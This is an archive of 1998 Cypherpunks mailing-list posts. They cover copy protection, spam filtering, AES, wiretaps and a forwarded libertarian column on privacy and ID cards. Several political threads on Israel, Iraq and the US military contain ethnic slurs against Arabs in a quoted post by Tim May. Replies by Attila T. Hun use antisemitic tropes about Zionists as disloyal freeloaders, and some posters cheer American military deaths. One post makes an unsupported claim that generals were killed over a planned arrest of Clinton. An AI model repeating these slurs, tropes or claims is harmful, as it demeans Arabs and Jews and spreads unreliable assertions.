not to do relays.  They're a bit inflexible,
but if you're up to rolling your own sendmail.cf code,
you can fix that.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 21 Feb 1998 06:11:38 +0800
To: cypherpunks@toad.com
Subject: Re:  Five industry giants propose encryption plan to protect Hollywood
Message-ID: <199802200635.BAA20101@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   Date: Thu, 19 Feb 1998 11:13:50 -0800 (PST)
   >   From: William Knowles <erehwon@dis.org>
   >   
   >   BURBANK, Calif. (February 19, 1998 09:06 a.m. EST
   >   http://www.nando.net) -- Five computer and electronics industry giants
   >   have agreed on a strategy to prevent people from illegally copying
   >   digital movies and music, the Los Angeles Times reported Thursday.
   >    
   >   According to the proposal, high-definition TV sets, personal
   >   computers, digital video disc players, digital video cassette
   >   recorders and set-top boxes would be equipped with technology that
   >   requires a code before a copyrighted piece of work can be transferred
   >   from one device to another.
   >    
   >   It would ensure that someone who watches or listens to digital movies
   >   or music over satellite services, cable networks and the Internet
   >   won't be able to make copies without permission.
   >    
   >   The encryption technique scrambles the copyrighted material in one
   >   device so it cannot be unscrambled by another device without the
   >   correct software key.

It's unscrambled when it is listened to...what are they thinking?
---guy

   Escpecially regarding computers, this won't work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 16:40:14 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Letting Israel Twist Slowly in the Desert Wind
In-Reply-To: <v03102802b112da19e5bd@[207.167.93.63]>
Message-ID: <199802200908.EAA00130@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102802b112da19e5bd@[207.167.93.63]>, on 02/19/98 
   at 11:23 PM, Tim May <tcmay@got.net> said:

>So? The land taken from a Palestinian farmer and given to a Polish Jew,
>for example, remains his, morally. That a neighboring country has many
>persons similar to him does not reduce his loss.

Well before the Israel war of Independence no one was kicked off their
farmland. There was a native population of Jews that lived there and own
their own land. Those who migrated there durring the 1st half of the
century *bought* the land that they lived on and also actively created new
land that was fallow. Much of the current farmland in Israel was not
stolen from the Arabs but came from swamps that were drained and deserts
that were irrigated (much of Israel was either swamp or desert before the
Jewish Immigration started).

The plight of the plaistinians after 1945 is known as the "spoils of war"
and since the palestinians were the *aggressor* I have no simpathy for
them (ya pay your money ya take your chances).

<sigh> It is really no surprise that so few Americans have any
understanding of the History or Politics of the region.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Logic, not magic.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO0yzo9Co1n+aLhhAQH1fwP/UvNUexgTHE2jQB6cUShwASG2A+2x70Os
iZP05PNGd049GFoBvXq5j3nKE/II95uouyQCsnpTXzUOjNniU6eH2x5fmxd7TBQg
Z+5X05+8yPYfi9kbxMg2ktvFIBjN+nMHmsO6nWKueqJNPh+Ru/C5p3UJNRA9M7ya
YlWKjkNFmpA=
=lA5+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 10:55:08 +0800
To: rantproc <cypherpunks@cyberpass.net>
Subject: Re: putting down the US military
In-Reply-To: <v0310280db1128853d74c@[207.167.93.63]>
Message-ID: <19980220.013910.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:1723, in <v0310280db1128853d74c@[207.167.93.63]>, 
    Tim May <tcmay@got.net> was purported to have 
    expostulated to perpetuate an opinion:

>At 4:07 PM -0800 2/19/98, Attila T. Hun wrote:

>>    absolutely. misplaced criticism and a personal offense to me
>>    as well as all other servicemen.

at 980219:1723, Tim May wrote:

>"Personal offense"?  Gee, I'm crushed.  (Attila, you wrote such
>a nice rant about fascist Amerika...then decided to be
>"offended" when your predictable hot button was pressed:  any
>criticism of the military and any cheering of its defeats.  So
>predictable.)
>
    No, Tim, not predictable --your cheers are misplaced.

    Amerika is fascist at best; we do not have the government
    my ancestors, and probably yours, fought to create 222 years
    ago. today's Federal Hamiltonian style central government 
    does not qualify as a republic, at best it is a plutocracy.

    No, my objection is _where_ you place your cheers. we need
    to bring down the fascists, not kill our fighting men, most
    of whom still believe in America the Beautiful, not the 
    cesspool you and I and the rest know it has become. we 
    almost had a military arrest of Clinton for treason in his
    first term, but a number of key generals and admirals were
    killed.

    turn your cheers at American defeats into jears to the heart
    of the problem in Washington.

    I'm not advocating a sapper, but somebody better wake the 
    serfs.

>Eggs have to be broken to make omelettes

    yes, but there is an unlimited supply of eggs in the minds
    of the politicians; they'll go on until they are gone, then
    shrug their shoulders and say: "we tried...."

    if the US suffers some really significant defeat, that will
    be the excuse for martial law and we will see more than the
    Admirality flag flying in every U.S. courtroom (courtesy of 
    FDR and 08 Mar 33). 

    If we run out of eggs, we will be overrun; and I may post
    a significant historical document, overlooked by all but a
    few, on that point.

    Amerika is fast heading towards moral bankruptcy because
    "it feels good" --just like the dog who licks his balls 
    because he can.

> aircraft carriers have to be sunk
>(my fondest wish for Operation Wag the Dog), 

    5,000 men to teach a whoring asshole like Clinton what?

    if Saddam, or friends, sinks a carrier, the asshole will
    nuke the middle east while every Joe Couch Potato screams 
    for blood --then what?
 
>War is hell.  Nothing new there.

    never was and never will be. and war should be avoided at
    all costs. 

    if the US was a good friend overseas instead of the greedy
    bastards and manipulators they have been most of this entire
    century, every country in the world would not hate the U.S. 
    --except maybe the Brits. Amerika has destabilized close to 
    90% of the world governments at one point of another in this
    century, including the Labour government preceding Thatcher.

    check the list of foreign policy failures in the mideast
    which I just posted.  the American fools put every one of
    the now anti-US bastards in power: Syria, Iraq, Libya,
    Jordon, and previously Iran, Egypt, and Lebanon. Britain
    kicked the Palestinians off the land they farmed since the
    diaspora --almost 2,000 years, and now the U.S props up both
    Israel and the PLO (half-heartedly, which is more than the
    rest of the Arabs do for Arafat, other than noise). The most
    stupid action after world war 2 was to permit Britain to
    establish Israel --only exceeded by our stupidity of
    continuing to support a pig like Bibbi.

    Amerika has made so many enemies overseas with its Pax 
    Americana policies that we do not have enough soldiers to
    be the world's policemen --and we should never have been
    in that position in the first place, except Amerika has
    always been the home of the free --the freedom to rape,
    pillage, and burn your fellow man, particularly if they
    are someplace else.

>To _not_ want the U.S. to be taught a lesson just because it
>means some soldiers must die as part of the lesson (else there
>is no lesson, of course) is to let the USG do anything it wants.
>
    no, the issue is to rectify the situation at the root: the
    cesspool. everyone one of us, regardless of our beliefs, is
    responsible for the meglomaniacs in our government. if those
    of us with supposed intelligence can not get Joe Couch 
    Potato off his ass --whose fault is it?  Clinton will get 
    them off their collective asses if an aircraft carrier goes 
    down --even if he scuttles it.

>Get used to it.  When Johhnie or Hans or Sergei goes to war, 
>he may die.  And perhaps because of Cypherpunks technologies. 
>All part of the scheme of things.
>
    doesn't need to be... 

    I am too well aware of what I have contributed first in
    black ops and then in technology until I got smart enough
    20+ years ago to refuse any direct military work. even so,
    it does not help withholding (but it feels good); high-tech 
    only kills more with less effort.

>        Tim gets to say his piece,
>>        and we get to lump it      --or lump Tim.
>
>Another empty threat from Attila?
>
    no, Tim, not at all, just a cheap pun!  someday maybe I'll 
    even be creative enough to coin a new "Dew Drop Inn"

    I'll defend to the death your right to say whatever you 
    wish; obviously, I also reserve the right to bitch! 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOztA7R8UA6T6u61AQF/awH/VbccORGJYCe+Xd4dIMRraFl8tOA/dB80
zLeNC5zWFxyQr4dQw94ySIy++XI/lkl/oi3csi3RTl6lw2SIJsfDJQ==
=HxNf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 18:09:10 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Declan pro-cencorship (sorta) (fwd)
In-Reply-To: <3.0.5.32.19980220011234.0089a100@popd.ix.netcom.com>
Message-ID: <199802201034.FAA00842@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980220011234.0089a100@popd.ix.netcom.com>, on 02/20/98 
   at 01:12 AM, Bill Stewart <bill.stewart@pobox.com> said:

>The more important number is the number of people deciding
>which things are and are not spam - "More than 1" is best,
>while "There can be only one" is censorship, either deliberate or as a
>side-effect.

The biggest problem I see with the various spam "solutions" are the
side-effects which universally are more repugnant than the original
"problem".

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Logic, not magic.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO1HJo9Co1n+aLhhAQGpoAQAvsUo/DjWyaa3vTBQ7HUyIu8QAqN0N3GA
P6UMTdRY61WviU1EVXGlUavFm3BIsHd6G/UD7W6CcMWCYuYtug4cH2D4jpk1lO8k
s1lQuDNdM6bNJMxhZFUPn4gvUR2QcoSr0txsNMQVJkmM4aEA5cnLwO6A1x8CQq4W
j2E8SoIiDFw=
=acT+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 18:17:29 +0800
To: "Paul Bradley" <csm70830@port.ac.uk>
Subject: Re: No Real Debate Yet on the War
In-Reply-To: <89B3250098@ou20.csm.port.ac.uk>
Message-ID: <199802201043.FAA00924@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <89B3250098@ou20.csm.port.ac.uk>, on 02/20/98 
   at 09:27 AM, "Paul Bradley" <csm70830@port.ac.uk> said:

>The more American, British, Australian, French etc. troops that die  in
>the Gulf War II (tm), the more the western world will realise that  war
>involves losses and that we cannot go on policing the world.  

Well if the US was to really take the moral HighGround on this they would
be bombing France and Germany for supplying them with CBW supplies for
years.

Does anyone have a French body count from when Israel blew up the breader
reactor they were building in Iraq back in 1980? (I am sure it was far too
small).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Bugs come in through open Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO1JM49Co1n+aLhhAQE6gAQAovGA/woNwxyJZoiPngh+xfr61kukB+sr
UQt1DP2e0d2w4GRcYRbAO7DGe4LlgiDMT+hxzKPyhqyZKW+ZeqF7Y947LtzvF7vd
0/3OQCXBeeu/YfxtBjraDtsfFloluTguDaNtjpJ2cw+MSybYss1bh5xtS+o8ta+x
2ohEZ7N8bXI=
=XPgz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 20 Feb 1998 11:45:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <199802200338.EAA13749@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim wrote to Ray:
> You've mentioned that spam is theft. 

Spam is plainly not theft.  Littering or pollution is a better analogy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 12:57:22 +0800
To: Tim May <cypherpunks@cyberpass.net>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <v0310280eb112ae1ab77c@[207.167.93.63]>
Message-ID: <19980220.042154.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:2004, in <v0310280eb112ae1ab77c@[207.167.93.63]>, 
    Tim May <tcmay@got.net> was purported to have 
    expostulated to perpetuate an opinion:

    [snip the dead issues on gloating...]

>And as for the thread name here, "PLO censoring pro-Iraqi sentiments,
>it's reprehensible that the U.S. is pushing a "peace process" which
>condones this kind of censorship. Better to just let the Arabs fight the
>Jews, without any funding from U.S. slave-taxpayer-units. If the Arabs
>kill all the Jews I'll say it was a really, really stupid ideas for a
>bunch of Jews from Poland and Germany and Russia to go kick out a bunch
>of "sand niggers" and "ragheads" and not expect retribution to someday
>arrive.
>
    they figure Britain owes Israel to them to atone for Brit   
    guilt for refusing to let them leave Germany for Palestine
    before Hitler reduced the number available to make the trip.

    and since Britain cant go it by themselves anymore, and the
    US has over 50% of the Zionists in the world --Russia being
    in second place-- the 10% of the Zionists in Palestine wag
    the US dog to protect them from "the barbarian Arabs" 
    (their attitude, not mine).

    the argument that Israel is the only true friend to the US
    in the Middle East is pure bullshit; with friends like 
    Israel who take our technology and either steal it directly 
    or reverse engineer it and sell it to China, Iran, South
    Africa who sells to China, etc. --who needs enemies. 

    the Israeli governments have double crossed U.S. interests 
    at most every point --they are a liability. if the U.S. had
    not acquiesced, under pressure of U.S. Zionist and general 
    WWII guilt, to Britain's division of Palestine, the Middle
    East would not be the problem it is --the Arabs plus the 
    Iranians (Farsi, not Arabs) would never have been able to 
    find a common unifying factor --and hate the US accordingly
    for its virtually unquestioning support of Israel.

    the U.S. should withdraw support from both sides of divided
    Palestine and let nature take its course. save the U.S. $5 
    billion dollars in acknowledged aid to Israel every year
    plus whatever amount is hidden in the black budgets, etc.
    plus the additional billions they raise from the guilt 
    ridden American Zionists.

    if there were no Israel, maybe the U.S. Zionists would 
    become Americans rather than Zionists first and residents of
    the U.S. second. if the really rabid ones wont shut up, give
    them an AR16, 200 rounds, and a ticket...

>Oh, and spare me the typical Zionist rhetoric about how "YHWH" or
>Whatever It's Damned Name Is "promised" this land to the Jews, despite
>their Polish or Russian or Ukrainian residency and genetics for thousands
>of years.

    me too...

>Fucking religious fruitcakes.

    you bet, but more than that, it's a class of discordant 
    freeloaders whose interests supersede those of the hand 
    that feeds and protect them.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNO0LEbR8UA6T6u61AQE/YQIAjmht713DIz6lxUtMwC+aANsfpLch2H6S
xarlS1TwZ1OTtcKPMKiEDqmuPL7sRUJrnBsuCF6TkdqoggPHfv9oEw==
=6OGe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eristic@gryzmak.lodz.pdi.net (Marek Jedlinski)
Date: Fri, 20 Feb 1998 14:41:34 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: Dealing with Spam, Part 1
In-Reply-To: <199802190557.XAA00934@manifold.algebra.com>
Message-ID: <34ee0fca.11042019@gryzmak.lodz.pdi.net>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:

>To add to this, the spam blocking technology is widely available and can be
>used by anyone with half brain. 

So? I use filtering, too (procmail) with relatively good results as far as
it goes, but *so what*? Filtering is the last-stance defense. I should not
have to filter out spam.

I addressed the various weak sides of filters at length previously, so I
won't repeat that. Digest: filtering is heuristic, error prone, consumes
the maintainer's time and consumes machine resources (think of all the perl
scripts people are beefing up their procmail filters with). I have to
connect to my ISP to modify/upload filters - this itself costs me time and
money too.


Here's why I say I should not *have to* filter:

We pay for advertising when we purchase the advertised products. Sometimes,
as in the case of software, the price increase due to advertising costs is
very high. This is a disgrace, BUT it is not theft.

We do NOT pay for advertising if we do not choose to purchase the product.
If you don't but Coke, you don't pay for Coke's advertising. If you don't
use buses, you do not chip into the transport company's coffer, either.
This is generally regarded as "fair".

With spam, it's different. I am forced to pay for spammers' ad campaigns
(pay, that is, in the costs of greater phone bills and expended time) even
though I have never and will never purchase anything advertised by spam.
Can you see the difference? *This* is why spam is THEFT. Normally,
advertisers get your money only when you buy the product, so you do get
something in return. Spammers take money from you whether or not you want
their products - and hey, they take money from you even if you explicitly
tell them to stop (unworkable fake "remove" lists sold to other spammers,
filter bocks bypassed by forged headers, etc).


>My spam filters make me spend no more than 
>a minute or so a day on quickly reviewing and deleting spams.

A minute. Will it still be a minute when you get a thousand spams per day?
Ten thousand? And why not, seeing how many *million* businesses there are
that might one day decide to spam. It costs them next to nothing.

>I do it by saving all messages that are likely to be spam to a separate
>folder. A quick browse through subject lines of these messages is enough
>to delete them really quickly.

So you're just playing into the hands of the spammers, who tell you to
"just hit delete". You are thus helping them, by allowing them to continue
unchallenged. It's your choice, of course, but IMO it's nothing to be proud
of.

>In the future such spam detection is going to become a lot harder. 

It already is. But you are right, it *is* going to get harder still,
because spammers are constantly getting better at bypassing filter blocks.
This invalidates the notion that filtering is somehow an "adequate"
solution.

>Perhaps
>a system where the first time sender pays a refundable digital fee to
>the reader will become necessary.

In vaguely distant future, perhaps. Currently this kind of scheme is
plainly *impossible* to implement, because (a) e-cash is still not cheap
enough (i.e. it doesn't make financial sense to transfer sub-dollar
amounts); (b) because there's no widely accepted standard for e-cash
transfers; (c) whether e-cash or not, you could only implement such a
pay-per-message scheme within the US, perhaps, and within several
West-European countries. In other places, the banking systems in place are
too behind-the-curve to allow this to work. Me - for instance - I have no
cheap *and* fast way of transferring foreign currency abroad (no, not even
with a regular VISA that I have). I'll skip the irrelevant details, but I
can explain it at length to anyone interested - but basically most banks in
Poland want you to have a separate dollar account for such transfers, with
a sum like $10.000 *frozen* in the account to use VISA internationally.
That's far more than I can afford, and I'm in the mid-range earnings
bracket. (Yes, this also means I can't order from online stores such as
amazon.com et al.)


.marek

-- 
Invalid thought. Close all mental processes and restart body.
Largactil Caf http://www.lodz.pdi.net/~eristic/index.html
Send message with GET PGP_KEY in subject for PGP public key.
Hail Eris. *plonk* trolls. Fight spam: http://www.cauce.org/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad <bdolan@USIT.NET>
Date: Fri, 20 Feb 1998 18:52:28 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Letting Israel Twist Slowly in the Desert Wind
In-Reply-To: <v03102802b112da19e5bd@[207.167.93.63]>
Message-ID: <Pine.GSO.3.96.980220053313.12989C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



It's interesting that there has been much effort recently to return
property stolen in the '30s and '40s by Nazis and communists to the
descendents of the original owners.  For example a Romanian friend
recently got his family farm back.  And then there is the "Swiss/Nazi 
gold" thing.  But, so far, I haven't heard many calls for refunds and
property returns in the middle east.

bd

On Thu, 19 Feb 1998, it was written:

>[...]
> 
> >Now some may wish to extend the lame argument that the British didn't have
> >the right to carve up the middle east nor did the Jews have the right to
> >immegrate to Israel. Well the simple fact of the matter is that *every*
> >country in exsistance today has been created by one group of people
> >conquering another. All the countries of North *and* South America were
> >formed that way. The empires of the Incas and Aztecs were formed the same
> >way. The various tribes of North America gaind control of their "huntting
> >grounds" by taking them away from those that were there before.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 14:17:49 +0800
To: "William H. Geiger III" <paladin@lvcablemodem.com>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <199802200612.BAA31481@users.invweb.net>
Message-ID: <19980220.055727.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:2334, in <199802200612.BAA31481@users.invweb.net>, 
    "William H. Geiger III" <whgiii@invweb.net> was purported to have 
    expostulated to perpetuate an opinion:

    [chop 80% of the various rantings]

> Tune said:

>>You sound like nothing more than disillusioned, spoiled, pompous asshole
>>when you presume to know what Americans "understand".  Your anarchistic
>>ravings only mark you for the idiot you are.

>>To everyone else besides Cordian who reads this, my apologies, but for
>>all it's failings, I still have pride in America... ...not for all the
>>foreign policy bullshit or the way the government fucks us over, or
>>starts wars, or sticks their collective nose in other countries
>>business...but for the fact that as a whole people, Americans still keep
>>trying, everyday, to be a better people. I'm proud of that.

>Wow! I haven't seen this kind of reactionary temper-tantrum since the
>last 4th of July BBQ down at the VFW.

    really? you start yours with a prayer followed by the statement:

        OK, fellas, friendly game; all guns on the table...

>So how long were you in?? Usally this type of "God save the King"
>mentality wears off after a boot has been in the field for a few months.
>For the more febal minded it lasts longer but they usally never make it
>above Cpl. or 1st Lt.

    very true, for those who have never been deployed into the
    face of the beast. 

    those who have been in combat have an entirely different
    attitude.     

    the peacetime Army is a often a goldbrickers union for lack
    of something better to do. and it is definitely not true in
    the Corps with the exception of the few who take the two
    year stint and four years active reserve and are somewhat
    disillusioned by the inactivity as they never hit the floats
    or are otherwise deployed.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNO0eL7R8UA6T6u61AQFotgH/c8XYz0psrJvjc5ibaf8PnY9aB1Y0hqX7
m11PvGFKKxtiRtDDOqv6zH0og68g1zpfJLcDBoI/GaFtOEctIfsEGg==
=cGsI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 21 Feb 1998 06:20:12 +0800
To: cypherpunks@toad.com
Subject: about AES
Message-ID: <199802200515.GAA26034@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




What is the encryption method that thinks to become
Advanced Encryption Standard (AES)? 
        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 20 Feb 1998 13:50:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
Message-ID: <199802200542.GAA29531@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric J. Tune wrote:

> You know Tim, I respect most of what you write, and I respect you in that
> you have your own free will and opinions and the right to express them, but
> what you have forgotten in your anarchistic ravings is that PEOPLE DIED IN
> SOMALIA, including a personal friend of mine.  They were all somebody's
> son, brother, and friend.  These soldiers went where they were ordered to
> go, as befits a soldier, and tried to do the job they were given and
> accomplish the mission, and for that EVERY ONE OF THEM DESERVES   Y O U R
> RESPECT.  I am quite sure the vast majority of them thought it was patently
> stupid to go to Somalia in the first place, but a soldier follows orders,
> legal ones, and tries to get the job done regardless of personal feelings.


There is honor in fighting for something you believe in, taking a risk with
the belief that your actions may make things better.  What were those
soldiers in Somalia fighting for?

Yes, we know those people died in Somalia.  What did they die for?

Oh, just following orders... where have I heard that before...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad <bdolan@USIT.NET>
Date: Fri, 20 Feb 1998 20:55:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax--The Horsemen are Riding
In-Reply-To: <v03102803b11239b85f86@[207.167.93.63]>
Message-ID: <Pine.GSO.3.96.980220074221.19875A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain





Watching the tube:

Andrea Greenspan just did the standard scare piece about the useful
idiots, Larry Wayne Harris & Co.  Then Kallstrom (thought he was retired!)
appeared, to warn vaguely of the need for more wiretaps and less
encryption.

One thing you can say for these guys:  they're predictable.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 20 Feb 1998 21:57:48 +0800
To: cypherpunks@cyberpass.net
Subject: Feb. 22 column - privacy, long version
Message-ID: <v04003a00b1132c79b221@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 19 Feb 1998 21:28:11 -0700
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
Date: Thu, 19 Feb 1998 20:25:09 -0800
To: cathy@engr.colostate.edu
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Feb. 22 column - privacy, long version
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/440
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    EDITORS NOTE: This is the longer version of "privacy," at 2,900 words.
A shorter,          2,400-word version also moves.
    A VERSION of this essay originally appeared in "Las Vegas" magazine.
    FOR EMBARGOED RELEASE DATED FEB. 22, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Big Brother wants your number

    The New York Times is generally in editorial favor of any government
intervention you can name. Most would agree it is the furthest thing from a
marketplace of paranoid, feds-are-out-to-get-us conspiracy theories.

  Even Times columnist William Safire is hardly a true Libertarian -- Mr.
Safire still believes "No sensible passenger minds the frisking for bombs
at airports."

  (I guess I'm not very sensible; it seems to me anyone who has ever put
any real effort into getting around such Fred-and-Ethel security screens
has succeeded, while the REAL target of all the sniffing and scanning
appears to be the now-prohibited  transport of tax-free agricultural
extracts and untaxed currency.)

  Anyway, more significant than what Mr. Safire actually wrote for
publication on Jan. 8, 1998, is where it was published: America's
pro-government paper of record, The New York Times.

  Mr. Safire warned, in part:


  "WASHINGTON -- Your right to privacy has been stripped away. You cannot
walk into your bank, or apply for a job, or access your personal computer,
without undergoing the scrutiny of strangers. You cannot use a credit card
to buy clothes to cover your body without baring your soul. Big Brother is
watching as never before.

  "Encouraged by an act of Congress, Texas and California now demand
thumbprints of applicants for drivers' licenses -- treating all drivers as
potential criminals.

  "Using a phony excuse about airplane security, airlines now demand
identification like those licenses to make sure passengers don't exchange
tickets to beat the company's rate-cutting promotions.

  "In the much-applauded pursuit of deadbeat dads, the Feds now demand that
all employers inform the government of every new hire, thereby building a
data base of who is working for whom that would be the envy of the KGB. ...

  "Hooked on easy borrowing, consumers turn to plastic for their purchases,
making records and sending electronic signals to telemarketers who track
them down at home. ...

  "Enough.

  "Fear of crime and terrorism has caused us to let down our guard against
excessive intrusion into the lives of the law-abiding. ... But doesn't this
creeping confluence of government snooping, commercial tracking and
cultural tolerance of eavesdropping threaten each individual American's
personal freedom? And isn't it time to reverse that terrible trend toward
national nakedness before it replaces privacy as an American value? ..."


  Unfortunately, Mr. Safire stopped short, in that January column, of
calling for an end to government "ID cards" of any sort, an end to
mis-labeled "airport security" checkpoints, an end to the very "War on
Drugs" under which most of these new interventions have been justified.

  He also ran the risk of diverting attention from the government as the
major culprit here, by treating as equally culpable the kind of folks who
collate data from warranty cards -- hardly the folks who have the right to
raid your home and throw you in jail if they don't like what they find.

  (On my list of things that concern me, my supermarket knowing what brand
of catfood I prefer still ranks somewhat below armed government agents
tracking where I travel, and how much cash I carry.)

  Finally, Mr. Safire suggest that we "Pay cash," which is harder to track.

  That advice might be fine, if the very pattern of abuses Mr. Safire
catalogs wasn't moving us rapidly toward the ballyhooed  "cashless
society."

  Already, the old $500 and $1,000 bills are nowhere to be found, and those
trying to withdraw more than $5,000 from their own savings accounts to buy
a used car or other large-ticket item find themselves being grilled by
their own government-regulated bankers -- amateur surrogates for the DEA
and IRS -- like so many money-laundering drug-dealers.


A rogue candidate

  That so-called "cashless society" is frequently on the mind of Aaron
Russo, former producer of such Hollywood films as "Trading Places" and "The
Rose," now running an iconoclastic long-shot 1998 GOP primary campaign
against Kenny Guinn -- former head warden of the Las Vegas government
schools and hand-picked anointee of the casino bosses -- for the
governorship of Nevada.

  Russo is campaigning on such populist issues as eliminating state
privilege taxes (so that car registration costs in Nevada would be limited
to "$35 and not one penny more" -- rather than surging upwards based on
blue-book value) and his vow to sue the federal government to fight the
taxation of Nevadans' "estimated" tips as income.

  But Russo has also includes in his platform opposition to such federal
steps as the wiring of all telephones for tapping (already authorized under
House Resolution 4922, which passed on Jan. 25, 1994), and the
aforementioned national law requiring all states to issue drivers' licenses
with thumbprints or other personalized "biometric" ID tags to serve as a
"national ID cards."

  Those stances have gained Russo the sobriquet of a "federal paranoiac"
from one well-established Nevada political columnist, who coincidentally
does not appear to have ever met a new tax he didn't think those in power
should have the "courage" to enact.

  "In my view, the wiretaps are authorized under a federal regulation, and
they cannot impose any federal regulations on any of the states," said
Russo, in between passing out cards to well-wishers during Sunday lunch at
the Celebrity Deli, on Flamingo near Maryland, as we took a break from an
afternoon watching the NFL playoff games ... liberally sprinkled with
$150,000 in TV campaign ads which Russo had bought in the one-week New
Year's period, just to put the opposition on notice that he's in the game.

  "The governor has the authority to go to the Supreme Court, and the
Supreme Court has to hear the case. You have something to stand on. A
senator or congressman needs other people to work with him. But in a
dispute between the feds and a state, the Supreme Court has the only
